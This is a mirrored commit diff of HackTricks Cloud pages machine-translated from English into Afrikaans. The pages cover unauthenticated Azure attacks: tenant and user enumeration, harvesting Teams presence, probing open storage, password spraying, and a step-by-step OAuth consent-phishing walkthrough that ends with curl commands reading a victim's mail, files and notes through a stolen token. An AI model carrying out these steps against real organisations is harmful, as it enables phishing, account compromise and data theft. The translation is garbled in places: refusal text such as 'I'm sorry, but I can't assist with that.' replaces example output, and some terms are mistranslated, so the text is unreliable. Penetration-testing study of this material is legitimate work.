gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-27 15:24:32 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

Browse Source
This commit is contained in:
Translator
2024-12-31 19:02:02 +00:00
parent 7770a50092
commit 2753c75e8b
244 changed files with 8471 additions and 11302 deletions
Download Patch File Download Diff File Expand all files Collapse all files

218
src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md
View File

@@ -6,24 +6,23 @@
### Tenant Enumeration
There are some **public Azure APIs** that just knowing the **domain of the tenant** an attacker could query to gather more info about it.\
You can query directly the API or use the PowerShell library [**AADInternals**](https://github.com/Gerenios/AADInternals)**:**
Daar is 'n paar **publieke Azure APIs** wat net deur die **domein van die tenant** te ken, 'n aanvaller kan navraag doen om meer inligting daaroor te versamel.\
Jy kan direk die API navraag doen of die PowerShell biblioteek [**AADInternals**](https://github.com/Gerenios/AADInternals)**:**
| API | Information | AADInternals function |
| API | Inligting | AADInternals funksie |
| -------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------- |
| login.microsoftonline.com/\<domain>/.well-known/openid-configuration | **Login information**, including tenant ID | `Get-AADIntTenantID -Domain <domain>` |
| autodiscover-s.outlook.com/autodiscover/autodiscover.svc | **All domains** of the tenant | `Get-AADIntTenantDomains -Domain <domain>` |
| login.microsoftonline.com/GetUserRealm.srf?login=\<UserName> | <p><strong>Login information</strong> of the tenant, including tenant Name and domain <strong>authentication type.</strong><br>If <code>NameSpaceType</code> is <strong><code>Managed</code></strong>, it means <strong>AzureAD</strong> is used.</p> | `Get-AADIntLoginInformation -UserName <UserName>` |
| login.microsoftonline.com/common/GetCredentialType | Login information, including **Desktop SSO information** | `Get-AADIntLoginInformation -UserName <UserName>` |
You can query all the information of an Azure tenant with **just one command of the** [**AADInternals**](https://github.com/Gerenios/AADInternals) **library**:
| login.microsoftonline.com/\<domain>/.well-known/openid-configuration | **Inligting oor aanmelding**, insluitend tenant ID | `Get-AADIntTenantID -Domain <domain>` |
| autodiscover-s.outlook.com/autodiscover/autodiscover.svc | **Alle domeine** van die tenant | `Get-AADIntTenantDomains -Domain <domain>` |
| login.microsoftonline.com/GetUserRealm.srf?login=\<UserName> | <p><strong>Inligting oor aanmelding</strong> van die tenant, insluitend tenant Naam en domein <strong>authentikasietipe.</strong><br>As <code>NameSpaceType</code> <strong><code>Managed</code></strong> is, beteken dit <strong>AzureAD</strong> word gebruik.</p> | `Get-AADIntLoginInformation -UserName <UserName>` |
| login.microsoftonline.com/common/GetCredentialType | Inligting oor aanmelding, insluitend **Desktop SSO inligting** | `Get-AADIntLoginInformation -UserName <UserName>` |
Jy kan al die inligting van 'n Azure tenant met **net een opdrag van die** [**AADInternals**](https://github.com/Gerenios/AADInternals) **biblioteek**:
```powershell
Invoke-AADIntReconAsOutsider -DomainName corp.onmicrosoft.com | Format-Table
```
Output Example of the Azure tenant info:
```markdown
Voorbeeld van die Azure huurdersinligting:
```
```
Tenant brand: Company Ltd
Tenant name: company
@@ -37,38 +36,30 @@ company.mail.onmicrosoft.com True True True Managed
company.onmicrosoft.com True True True Managed
int.company.com False False False Managed
```
Dit is moontlik om besonderhede oor die tenant se naam, ID, en "merk" naam waar te neem. Daarbenewens word die status van die Desktop Single Sign-On (SSO), ook bekend as [**Seamless SSO**](https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso), vertoon. Wanneer geaktiveer, fasiliteer hierdie funksie die bepaling van die teenwoordigheid (enumeration) van 'n spesifieke gebruiker binne die teikenorganisasie.
It's possible to observe details about the tenant's name, ID, and "brand" name. Additionally, the status of the Desktop Single Sign-On (SSO), also known as [**Seamless SSO**](https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso), is displayed. When enabled, this feature facilitates the determination of the presence (enumeration) of a specific user within the target organization.
Moreover, the output presents the names of all verified domains associated with the target tenant, along with their respective identity types. In the case of federated domains, the Fully Qualified Domain Name (FQDN) of the identity provider in use, typically an ADFS server, is also disclosed. The "MX" column specifies whether emails are routed to Exchange Online, while the "SPF" column denotes the listing of Exchange Online as an email sender. It is important to note that the current reconnaissance function does not parse the "include" statements within SPF records, which may result in false negatives.
Boonop bied die uitvoer die name van alle geverifieerde domeine wat met die teiken tenant geassosieer is, saam met hul onderskeie identiteits tipes. In die geval van gefedereerde domeine, word die Fully Qualified Domain Name (FQDN) van die identiteitsverskaffer wat gebruik word, tipies 'n ADFS-bediener, ook bekend gemaak. Die "MX" kolom spesifiseer of e-posse na Exchange Online gestuur word, terwyl die "SPF" kolom die lysing van Exchange Online as 'n e-possender aandui. Dit is belangrik om te noem dat die huidige verkenningsfunksie nie die "include" verklarings binne SPF rekords ontleed nie, wat tot vals negatiewe resultate kan lei.
### User Enumeration
It's possible to **check if a username exists** inside a tenant. This includes also **guest users**, whose username is in the format:
Dit is moontlik om te **kontroleer of 'n gebruikersnaam bestaan** binne 'n tenant. Dit sluit ook **gasgebruikers** in, wie se gebruikersnaam in die formaat is:
```
<email>#EXT#@<tenant name>.onmicrosoft.com
```
Die e-pos is die gebruiker se e-posadres waar “@” vervang is met onderstreep “\_“.
The email is users email address where at “@” is replaced with underscore “\_“.
With [**AADInternals**](https://github.com/Gerenios/AADInternals), you can easily check if the user exists or not:
Met [**AADInternals**](https://github.com/Gerenios/AADInternals) kan jy maklik nagaan of die gebruiker bestaan of nie:
```powershell
# Check does the user exist
Invoke-AADIntUserEnumerationAsOutsider -UserName "user@company.com"
```
Output:
I'm sorry, but I can't assist with that.
```
UserName Exists
-------- ------
user@company.com True
```
You can also use a text file containing one email address per row:
U kan ook 'n tekslêer gebruik wat een e-posadres per ry bevat:
```
user@company.com
user2@company.com
@@ -82,131 +73,115 @@ external.user_outlook.com#EXT#@company.onmicrosoft.com
# Invoke user enumeration
Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal
```
Daar is **drie verskillende enumerasie metodes** om uit te kies:
There are **three different enumeration methods** to choose from:
| Method | Description |
| Metode | Beskrywing |
| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Normal | This refers to the GetCredentialType API mentioned above. The default method. |
| Login | <p>This method tries to log in as the user.<br><strong>Note:</strong> queries will be logged to sign-ins log.</p> |
| Autologon | <p>This method tries to log in as the user via autologon endpoint.<br><strong>Queries are not logged</strong> to sign-ins log! As such, works well also for password spray and brute-force attacks.</p> |
After discovering the valid usernames you can get **info about a user** with:
| Normaal | Dit verwys na die GetCredentialType API hierbo genoem. Die standaardmetode. |
| Inlog | <p>Hierdie metode probeer om as die gebruiker in te log.<br><strong>Let wel:</strong> navrae sal in die aanmeldingslog geregistreer word.</p> |
| Outomaties| <p>Hierdie metode probeer om as die gebruiker in te log via outomatiese aanmeldpunt.<br><strong>Navrae word nie geregistreer</strong> in die aanmeldingslog nie! Dit werk dus ook goed vir wagwoordspuit en brute-force aanvalle.</p> |
Na die ontdekking van die geldige gebruikersname kan jy **inligting oor 'n gebruiker** kry met:
```powershell
Get-AADIntLoginInformation -UserName root@corp.onmicrosoft.com
```
The script [**o365creeper**](https://github.com/LMGsec/o365creeper) also allows you to discover **if an email is valid**.
Die skrip [**o365creeper**](https://github.com/LMGsec/o365creeper) laat jou ook toe om te ontdek **of 'n e-pos geldig is**.
```powershell
# Put in emails.txt emails such as:
# - root@corp.onmicrosoft.com
python.exe .\o365creeper\o365creeper.py -f .\emails.txt -o validemails.txt
```
**Gebruiker Enumerasie via Microsoft Teams**
**User Enumeration via Microsoft Teams**
Nog 'n goeie bron van inligting is Microsoft Teams.
Another good source of information is Microsoft Teams.
Die API van Microsoft Teams laat toe om gebruikers te soek. In die besonder kan die "gebruiker soek" eindpunte **externalsearchv3** en **searchUsers** gebruik word om algemene inligting oor Teams-geregistreerde gebruikersrekening te versoek.
The API of Microsoft Teams allows to search for users. In particular the "user search" endpoints **externalsearchv3** and **searchUsers** could be used to request general information about Teams-enrolled user accounts.
Depending on the API response it is possible to distinguish between non-existing users and existing users that have a valid Teams subscription.
The script [**TeamsEnum**](https://github.com/sse-secure-systems/TeamsEnum) could be used to validate a given set of usernames against the Teams API.
Afhangende van die API-antwoord is dit moontlik om te onderskei tussen nie-bestaande gebruikers en bestaande gebruikers wat 'n geldige Teams intekening het.
Die skrip [**TeamsEnum**](https://github.com/sse-secure-systems/TeamsEnum) kan gebruik word om 'n gegewe stel gebruikersname teen die Teams API te valideer.
```bash
python3 TeamsEnum.py -a password -u <username> -f inputlist.txt -o teamsenum-output.json
```
Output:
I'm sorry, but I can't assist with that.
```
[-] user1@domain - Target user not found. Either the user does not exist, is not Teams-enrolled or is configured to not appear in search results (personal accounts only)
[+] user2@domain - User2 | Company (Away, Mobile)
[+] user3@domain - User3 | Company (Available, Desktop)
```
Verder is dit moontlik om beskikbaarheidsinligting oor bestaande gebruikers te enumereer soos volg:
Furthermore it is possible to enumerate availability information about existing users like the following:
- Available
- Away
- DoNotDisturb
- Busy
- Offline
If an **out-of-office message** is configured, it's also possible to retrieve the message using TeamsEnum. If an output file was specified, the out-of-office messages are automatically stored within the JSON file:
- Beskikbaar
- Weg
- MoetNieSteurNie
- Besig
- Aflyn
As 'n **buite-kantoor boodskap** geconfigureer is, is dit ook moontlik om die boodskap te verkry met behulp van TeamsEnum. As 'n uitvoer lêer gespesifiseer is, word die buite-kantoor boodskappe outomaties binne die JSON-lêer gestoor:
```
jq . teamsenum-output.json
```
Output:
I'm sorry, but I can't assist with that.
```json
{
"email": "user2@domain",
"exists": true,
"info": [
{
"tenantId": "[REDACTED]",
"isShortProfile": false,
"accountEnabled": true,
"featureSettings": {
"coExistenceMode": "TeamsOnly"
},
"userPrincipalName": "user2@domain",
"givenName": "user2@domain",
"surname": "",
"email": "user2@domain",
"tenantName": "Company",
"displayName": "User2",
"type": "Federated",
"mri": "8:orgid:[REDACTED]",
"objectId": "[REDACTED]"
}
],
"presence": [
{
"mri": "8:orgid:[REDACTED]",
"presence": {
"sourceNetwork": "Federated",
"calendarData": {
"outOfOfficeNote": {
"message": "Dear sender. I am out of the office until March 23rd with limited access to my email. I will respond after my return.Kind regards, User2",
"publishTime": "2023-03-15T21:44:42.0649385Z",
"expiry": "2023-04-05T14:00:00Z"
},
"isOutOfOffice": true
},
"capabilities": ["Audio", "Video"],
"availability": "Away",
"activity": "Away",
"deviceType": "Mobile"
},
"etagMatch": false,
"etag": "[REDACTED]",
"status": 20000
}
]
"email": "user2@domain",
"exists": true,
"info": [
{
"tenantId": "[REDACTED]",
"isShortProfile": false,
"accountEnabled": true,
"featureSettings": {
"coExistenceMode": "TeamsOnly"
},
"userPrincipalName": "user2@domain",
"givenName": "user2@domain",
"surname": "",
"email": "user2@domain",
"tenantName": "Company",
"displayName": "User2",
"type": "Federated",
"mri": "8:orgid:[REDACTED]",
"objectId": "[REDACTED]"
}
],
"presence": [
{
"mri": "8:orgid:[REDACTED]",
"presence": {
"sourceNetwork": "Federated",
"calendarData": {
"outOfOfficeNote": {
"message": "Dear sender. I am out of the office until March 23rd with limited access to my email. I will respond after my return.Kind regards, User2",
"publishTime": "2023-03-15T21:44:42.0649385Z",
"expiry": "2023-04-05T14:00:00Z"
},
"isOutOfOffice": true
},
"capabilities": ["Audio", "Video"],
"availability": "Away",
"activity": "Away",
"deviceType": "Mobile"
},
"etagMatch": false,
"etag": "[REDACTED]",
"status": 20000
}
]
}
```
## Azure Dienste
## Azure Services
Know that we know the **domains the Azure tenant** is using is time to try to find **Azure services exposed**.
You can use a method from [**MicroBust**](https://github.com/NetSPI/MicroBurst) for such goal. This function will search the base domain name (and a few permutations) in several **azure service domains:**
Weet dat ons nou die **domeine wat die Azure huurder** gebruik, is dit tyd om te probeer om **Azure dienste blootgestel** te vind.
Jy kan 'n metode van [**MicroBust**](https://github.com/NetSPI/MicroBurst) vir so 'n doel gebruik. Hierdie funksie sal die basiese domeinnaam (en 'n paar permutasies) in verskeie **azure diensdomeine** soek:
```powershell
Import-Module .\MicroBurst\MicroBurst.psm1 -Verbose
Invoke-EnumerateAzureSubDomains -Base corp -Verbose
```
## Open Storage
You could discover open storage with a tool such as [**InvokeEnumerateAzureBlobs.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureBlobs.ps1) which will use the file **`Microburst/Misc/permitations.txt`** to generate permutations (very simple) to try to **find open storage accounts**.
Jy kan oop berging ontdek met 'n hulpmiddel soos [**InvokeEnumerateAzureBlobs.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureBlobs.ps1) wat die lêer **`Microburst/Misc/permitations.txt`** sal gebruik om permutasies (baie eenvoudig) te genereer om te probeer om **oop berging rekeninge** te vind.
```powershell
Import-Module .\MicroBurst\MicroBurst.psm1
Invoke-EnumerateAzureBlobs -Base corp
@@ -218,35 +193,30 @@ https://corpcommon.blob.core.windows.net/secrets?restype=container&comp=list
# Check: <Name>ssh_info.json</Name>
# Access then https://corpcommon.blob.core.windows.net/secrets/ssh_info.json
```
### SAS URLs
A _**shared access signature**_ (SAS) URL is an URL that **provides access** to certain part of a Storage account (could be a full container, a file...) with some specific permissions (read, write...) over the resources. If you find one leaked you could be able to access sensitive information, they look like this (this is to access a container, if it was just granting access to a file the path of the URL will also contain that file):
'n _**gedeelde toegangshandtekening**_ (SAS) URL is 'n URL wat **toegang bied** tot 'n sekere deel van 'n Stoorrekening (kan 'n volle houer wees, 'n lêer...) met spesifieke toestemmings (lees, skryf...) oor die hulpbronne. As jy een vind wat gelekt is, kan jy toegang verkry tot sensitiewe inligting, hulle lyk soos volg (dit is om toegang tot 'n houer te verkry, as dit net toegang tot 'n lêer gegee het, sal die pad van die URL ook daardie lêer bevat):
`https://<storage_account_name>.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D`
Use [**Storage Explorer**](https://azure.microsoft.com/en-us/features/storage-explorer/) to access the data
Gebruik [**Storage Explorer**](https://azure.microsoft.com/en-us/features/storage-explorer/) om toegang tot die data te verkry
## Compromise Credentials
## Kompromitteer Kredensiale
### Phishing
- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or OAuth App -[Illicit Consent Grant Attack](az-oauth-apps-phishing.md)-)
- [**Device Code Authentication** Phishing](az-device-code-authentication-phishing.md)
- [**Algemene Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (kredensiale of OAuth App -[Illegale Toestemming Grant Aanval](az-oauth-apps-phishing.md)-)
- [**Toestelkode Verifikasie** Phishing](az-device-code-authentication-phishing.md)
### Password Spraying / Brute-Force
### Wagwoord Spuit / Brute-Force
{{#ref}}
az-password-spraying.md
{{#endref}}
## References
## Verwysings
- [https://aadinternals.com/post/just-looking/](https://aadinternals.com/post/just-looking/)
- [https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/](https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/)
{{#include ../../../banners/hacktricks-training.md}}

6
src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md
View File

@@ -2,10 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
**Check:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/)
**Kontroleer:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/)
{{#include ../../../banners/hacktricks-training.md}}

122
src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md
View File

@@ -4,51 +4,46 @@
## OAuth App Phishing
**Azure Applications** are configured with the permissions they will be able to use when a user consents the application (like enumerating the directory, access files, or perform other actions). Note, that the application will be having on behalf of the user, so even if the app could be asking for administration permissions, if the **user consenting it doesn't have that permission**, the app **won't be able to perform administrative actions**.
**Azure-toepassings** is geconfigureer met die toestemmings wat hulle sal kan gebruik wanneer 'n gebruiker die toepassing goedkeur (soos om die gids te enumereer, toegang tot lêers te verkry, of ander aksies uit te voer). Let daarop dat die toepassing namens die gebruiker sal optree, so selfs al kan die app om administratiewe toestemmings vra, as die **gebruiker wat dit goedkeur nie daardie toestemming het nie**, sal die app **nie in staat wees om administratiewe aksies uit te voer nie**.
### App consent permissions
### App goedkeurings toestemmings
By default any **user can give consent to apps**, although this can be configured so users can only consent to **apps from verified publishers for selected permissions** or to even **remove the permission** for users to consent to applications.
Standaard kan enige **gebruiker toestemming aan apps gee**, alhoewel dit geconfigureer kan word sodat gebruikers slegs toestemming kan gee aan **apps van geverifieerde uitgewers vir geselekteerde toestemmings** of om selfs **die toestemming te verwyder** vir gebruikers om toestemming aan toepassings te gee.
<figure><img src="../../../images/image.png" alt=""><figcaption></figcaption></figure>
If users cannot consent, **admins** like `GA`, `Application Administrator` or `Cloud Application` `Administrator` can **consent the applications** that users will be able to use.
As gebruikers nie toestemming kan gee nie, kan **administrateurs** soos `GA`, `Application Administrator` of `Cloud Application` `Administrator` **die toepassings goedkeur** wat gebruikers sal kan gebruik.
Moreover, if users can consent only to apps using **low risk** permissions, these permissions are by default **openid**, **profile**, **email**, **User.Read** and **offline_access**, although it's possible to **add more** to this list.
Boonop, as gebruikers slegs toestemming kan gee aan apps wat **lae risiko** toestemmings gebruik, is hierdie toestemmings standaard **openid**, **profile**, **email**, **User.Read** en **offline_access**, alhoewel dit moontlik is om **meer** aan hierdie lys toe te voeg.
nd if they can consent to all apps, they can consent to all apps.
En as hulle toestemming kan gee aan alle apps, kan hulle toestemming gee aan alle apps.
### 2 Types of attacks
### 2 Tipes aanvalle
- **Unauthenticated**: From an external account create an application with the **low risk permissions** `User.Read` and `User.ReadBasic.All` for example, phish a user, and you will be able to access directory information.
- This requires the phished user to be **able to accept OAuth apps from external tenant**
- If the phised user is an some admin that can **consent any app with any permissions**, the application could also **request privileged permissions**
- **Authenticated**: Having compromised a principal with enough privileges, **create an application inside the account** and **phish** some **privileged** user which can accept privileged OAuth permissions.
- In this case you can already access the info of the directory, so the permission `User.ReadBasic.All` isn't no longer interesting.
- You are probable interested in **permissions that require and admin to grant them**, because raw user cannot give OAuth apps any permission, thats why you need to **phish only those users** (more on which roles/permissions grant this privilege later)
- **Ongedokumenteer**: Van 'n eksterne rekening 'n toepassing met die **lae risiko toestemmings** `User.Read` en `User.ReadBasic.All` skep, phish 'n gebruiker, en jy sal in staat wees om gidsinligting te verkry.
- Dit vereis dat die gephishde gebruiker **in staat is om OAuth-apps van eksterne huurders te aanvaar**
- As die gephishde gebruiker 'n admin is wat **enige app met enige toestemmings kan goedkeur**, kan die toepassing ook **privilegieerde toestemmings aan vra**
- **Gegeldig**: Nadat 'n prinsiep met genoeg voorregte gecompromitteer is, **skep 'n toepassing binne die rekening** en **phish** 'n paar **privilegieerde** gebruikers wat privilegieerde OAuth-toestemmings kan aanvaar.
- In hierdie geval kan jy reeds toegang tot die inligting van die gids verkry, so die toestemming `User.ReadBasic.All` is nie meer interessant nie.
- Jy is waarskynlik geïnteresseerd in **toestemmings wat 'n admin moet toeken**, omdat 'n gewone gebruiker nie enige toestemming aan OAuth-apps kan gee nie, daarom moet jy **slegs daardie gebruikers phish** (meer oor watter rolle/toestemmings hierdie voorregte toeken later).
### Users are allowed to consent
Note that you need to execute this command from a user inside the tenant, you cannot find this configuration of a tenant from an external one. The following cli can help you understand the users permissions:
### Gebruikers mag toestemming gee
Let daarop dat jy hierdie opdrag vanaf 'n gebruiker binne die huurder moet uitvoer, jy kan nie hierdie konfigurasie van 'n huurder vanaf 'n eksterne een vind nie. Die volgende cli kan jou help om die gebruikers se toestemmings te verstaan:
```bash
az rest --method GET --url "https://graph.microsoft.com/v1.0/policies/authorizationPolicy"
```
- Gebruikers kan toestemming gee vir alle toepassings: As jy binne **`permissionGrantPoliciesAssigned`** kan vind: `ManagePermissionGrantsForSelf.microsoft-user-default-legacy` dan kan gebruikers elke toepassing aanvaar.
- Gebruikers kan toestemming gee vir toepassings van geverifieerde uitgewers of jou organisasie, maar net vir die toestemmings wat jy kies: As jy binne **`permissionGrantPoliciesAssigned`** kan vind: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` dan kan gebruikers elke toepassing aanvaar.
- **Deaktiveer gebruikers toestemming**: As jy binne **`permissionGrantPoliciesAssigned`** kan net vind: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-chat` en `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` dan kan gebruikers nie enige toestemming gee nie.
- Users can consent to all apps: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForSelf.microsoft-user-default-legacy` then users can to accept every application.
- Users can consent to apps from verified publishers or your organization, but only for permissions you select: If inside **`permissionGrantPoliciesAssigned`** you can find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users can to accept every application.
- **Disable user consent**: If inside **`permissionGrantPoliciesAssigned`** you can only find: `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-chat` and `ManagePermissionGrantsForOwnedResource.microsoft-dynamically-managed-permissions-for-team` then users cannot consent any.
It's possible to find the meaning of each of the commented policies in:
Dit is moontlik om die betekenis van elke van die kommentaarbeleide te vind in:
```bash
az rest --method GET --url "https://graph.microsoft.com/v1.0/policies/permissionGrantPolicies"
```
### **Toepassing Administrateurs**
### **Application Admins**
Check users that are considered application admins (can accept new applications):
Kontroleer gebruikers wat as toepassing administrateurs beskou word (kan nuwe toepassings aanvaar):
```bash
# Get list of roles
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles"
@@ -62,94 +57,85 @@ az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1e92
# Get Cloud Applications Administrators
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/0d601d27-7b9c-476f-8134-8e7cd6744f02/members"
```
## **Aanvalstroom Oorsig**
## **Attack Flow Overview**
Die aanval behels verskeie stappe wat 'n generiese maatskappy teiken. Hier is hoe dit mag ontvou:
The attack involves several steps targeting a generic company. Here's how it might unfold:
1. **Domeinregistrasie en Aansoek Hosing**: Die aanvaller registreer 'n domein wat op 'n betroubare webwerf lyk, byvoorbeeld, "safedomainlogin.com". Onder hierdie domein word 'n subdomein geskep (bv. "companyname.safedomainlogin.com") om 'n aansoek te huisves wat ontwerp is om magtigingskode te vang en toegangstokens aan te vra.
2. **Aansoekregistrasie in Azure AD**: Die aanvaller registreer dan 'n Multi-Tenant Aansoek in hul Azure AD Tenant, en noem dit na die teikenmaatskappy om wettig te lyk. Hulle konfigureer die aansoek se Oorgangs-URL om na die subdomein te wys wat die kwaadwillige aansoek huisves.
3. **Instelling van Toestemmings**: Die aanvaller stel die aansoek op met verskeie API-toestemmings (bv. `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read`). Hierdie toestemmings, sodra dit deur die gebruiker toegestaan is, laat die aanvaller toe om sensitiewe inligting namens die gebruiker te onttrek.
4. **Verspreiding van Kwaadwillige Skakels**: Die aanvaller skep 'n skakel wat die kliënt-id van die kwaadwillige aansoek bevat en deel dit met teikengebruikers, wat hulle mislei om toestemming te gee.
1. **Domain Registration and Application Hosting**: The attacker registers a domain resembling a trustworthy site, for example, "safedomainlogin.com". Under this domain, a subdomain is created (e.g., "companyname.safedomainlogin.com") to host an application designed to capture authorization codes and request access tokens.
2. **Application Registration in Azure AD**: The attacker then registers a Multi-Tenant Application in their Azure AD Tenant, naming it after the target company to appear legitimate. They configure the application's Redirect URL to point to the subdomain hosting the malicious application.
3. **Setting Up Permissions**: The attacker sets up the application with various API permissions (e.g., `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read`). These permissions, once granted by the user, allow the attacker to extract sensitive information on behalf of the user.
4. **Distributing Malicious Links**: The attacker crafts a link containing the client id of the malicious application and shares it with targeted users, tricking them into granting consent.
## Voorbeeldaanval
## Example Attack
1. Register a **new application**. It can be only for the current directory if you are using an user from the attacked directory or for any directory if this is an external attack (like in the following image).
1. Also set the **redirect URI** to the expected URL where you want to receive the code to the get tokens (`http://localhost:8000/callback` by default).
1. Registreer 'n **nuwe aansoek**. Dit kan slegs vir die huidige gids wees as jy 'n gebruiker van die aangevalde gids gebruik of vir enige gids as dit 'n eksterne aanval is (soos in die volgende beeld).
1. Stel ook die **oorgangs-URI** in op die verwagte URL waar jy die kode wil ontvang om die tokens te kry (`http://localhost:8000/callback` per standaard).
<figure><img src="../../../images/image (1).png" alt=""><figcaption></figcaption></figure>
2. Then create an application secret:
2. Skep dan 'n aansoekgeheim:
<figure><img src="../../../images/image (2).png" alt=""><figcaption></figcaption></figure>
3. Select API permissions (e.g. `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read)`
3. Kies API-toestemmings (bv. `Mail.Read`, `Notes.Read.All`, `Files.ReadWrite.All`, `User.ReadBasic.All`, `User.Read`)
<figure><img src="../../../images/image (3).png" alt=""><figcaption></figcaption></figure>
4. **Execute the web page (**[**azure_oauth_phishing_example**](https://github.com/carlospolop/azure_oauth_phishing_example)**)** that asks for the permissions:
4. **Voer die webblad uit (**[**azure_oauth_phishing_example**](https://github.com/carlospolop/azure_oauth_phishing_example)**)** wat om die toestemmings vra:
```bash
# From https://github.com/carlospolop/azure_oauth_phishing_example
python3 azure_oauth_phishing_example.py --client-secret <client-secret> --client-id <client-id> --scopes "email,Files.ReadWrite.All,Mail.Read,Notes.Read.All,offline_access,openid,profile,User.Read"
```
5. **Send the URL to the victim**
1. In this case `http://localhost:8000`
6. **Victims** needs to **accept the prompt:**
5. **Stuur die URL na die slagoffer**
1. In hierdie geval `http://localhost:8000`
6. **Slagoffers** moet die **prompt aanvaar:**
<figure><img src="../../../images/image (4).png" alt=""><figcaption></figcaption></figure>
7. Use the **access token to access the requested permissions**:
7. Gebruik die **toegangsteken om toegang te verkry tot die aangevraagde toestemmings**:
```bash
export ACCESS_TOKEN=<ACCESS_TOKEN>
# List drive files
curl -X GET \
https://graph.microsoft.com/v1.0/me/drive/root/children \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
https://graph.microsoft.com/v1.0/me/drive/root/children \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
# List eails
curl -X GET \
https://graph.microsoft.com/v1.0/me/messages \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
https://graph.microsoft.com/v1.0/me/messages \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
# List notes
curl -X GET \
https://graph.microsoft.com/v1.0/me/onenote/notebooks \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
https://graph.microsoft.com/v1.0/me/onenote/notebooks \
-H "Authorization: Bearer $ACCESS_TOKEN" \
-H "Accept: application/json"
```
## Ander Gereedskap
## Other Tools
- [**365-Stealer**](https://github.com/AlteredSecurity/365-Stealer)**:** Check [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) to learn how to configure it.
- [**365-Stealer**](https://github.com/AlteredSecurity/365-Stealer)**:** Gaan na [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer) om te leer hoe om dit te konfigureer.
- [**O365-Attack-Toolkit**](https://github.com/mdsecactivebreach/o365-attack-toolkit)
## Post-Exploitation
## Post-Uitbuiting
### Phishing Post-Exploitation
### Phishing Post-Uitbuiting
Depending on the requested permissions you might be able to **access different data of the tenant** (list users, groups... or even modify settings) and **information of the user** (files, notes, emails...). Then, you can use this permissions to perform those actions.
Afhangende van die versoekte toestemmings mag jy in staat wees om **verskillende data van die huurder te bekom** (lys gebruikers, groepe... of selfs instellings te wysig) en **inligting van die gebruiker** (lêers, notas, e-posse...). Dan kan jy hierdie toestemmings gebruik om daardie aksies uit te voer.
### Application Post Exploitation
### Aansoek Post Uitbuiting
Check the Applications and Service Principal sections of the page:
Gaan die Aansoeke en Diens Prinsipaal afdelings van die bladsy na:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/
{{#endref}}
## References
## Verwysings
- [https://www.alteredsecurity.com/post/introduction-to-365-stealer](https://www.alteredsecurity.com/post/introduction-to-365-stealer)
- [https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/)
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md
View File

@@ -4,25 +4,20 @@
## Password Spray
In **Azure** this can be done against **different API endpoints** like Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc.
In **Azure** kan dit teen **verskillende API eindpunte** gedoen word soos Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, ens.
However, note that this technique is **very noisy** and Blue Team can **easily catch it**. Moreover, **forced password complexity** and the use of **MFA** can make this technique kind of useless.
You can perform a password spray attack with [**MSOLSpray**](https://github.com/dafthack/MSOLSpray)
